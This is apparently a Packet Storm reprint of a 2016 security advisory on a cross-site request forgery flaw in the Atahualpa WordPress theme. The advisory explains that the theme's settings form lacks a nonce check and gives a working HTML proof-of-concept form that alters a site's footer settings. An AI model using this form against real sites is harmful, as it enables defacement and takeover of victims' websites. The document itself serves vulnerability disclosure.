exploit the possibilities

WordPress Atahualpa Theme Cross Site Request Forgery

WordPress Atahualpa Theme Cross Site Request Forgery
Posted Mar 3, 2017
Authored by Spyros Gasteratos

WordPress Atahualpa theme suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
MD5 | 46b37ccd70ecde5a32306e2e2bc4fe7e

WordPress Atahualpa Theme Cross Site Request Forgery

Change Mirror Download
------------------------------------------------------------------------
Cross-Site Request Forgery in Atahualpa WordPress Theme
------------------------------------------------------------------------
Spyros Gasteratos, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross Site Request Forgery vulnerability exists in the Atahualpa
Wordpress theme which allows attackers to legitimate users into
performing unintended actions on the Atahualpa theme configuration page.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0003

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Atahualpa WordPress Theme
WordPress Theme.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_atahualpa_wordpress_theme.html

The theme's save configuration settings form doesn't include a Wordpress CSRF nonce and consequently the script servicing the request doesn't check for one. This allows the form to be submitted with preloaded values as long as the browser sends a valid login cookie.

This allows attackers who lure legitimate users with an active Wordpress session to an irrelevant website which submits the "Save Settings" request to the user's Wordpress install. Since the request is towards a domain for which the browser has cookies the legitimate cookies will be submitted and the request will succeed.

The theme's configuration panel allows setting a variety of configuration options including changes in the website's appearance as well as appending Javascript in several areas. Attackers can use this vulnerability to take over a Wordpress website.
Proof of concept

Install the theme, login as admin and load the following csrf poc in the same browser on another tab, when clicking "Submit" it will modify the page footer.

<html>
<body>
<form action="http://<target>/wp-admin/themes.php?page=atahualpa-options" method="POST">
<input type="hidden" name="footer_style" value="background-color: #ffffff;
border-top: dashed 1px #cccccc;
padding: 10000px;
text-align: center;
color: #777777;
font-size: 95%;
/*bye*/"/>
<input type="hidden" name="footer_style_links" value="text-decoration: none;
color: #777777;
font-weight: normal;"/>
<input type="hidden" name="footer_style_links_hover" value="text-decoration: none;
color: #777777;
font-weight: normal;"/>
<input type="hidden" name="footer_style_content" value="Copyright &copy; %current-year% %home% - All Rights Reserved"/>
<input type="hidden" name="full_width_footer" value="No"/>
<input type="hidden" name="sticky_layout_footer" value="No"/>
<input type="hidden" name="footer_show_queries" value="No"/>
<input type="hidden" name="save" value=""/>
<input type="hidden" name="action" value="save"/>
<input type="hidden" name="category" value="footer-style"/>
<input type="submit" value="Submit"/>
</form>
</body>
</html>

------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.
Login or Register to add favorites

File Archive:

July 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    15 Files
  • 2
    Jul 2nd
    19 Files
  • 3
    Jul 3rd
    12 Files
  • 4
    Jul 4th
    1 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    25 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close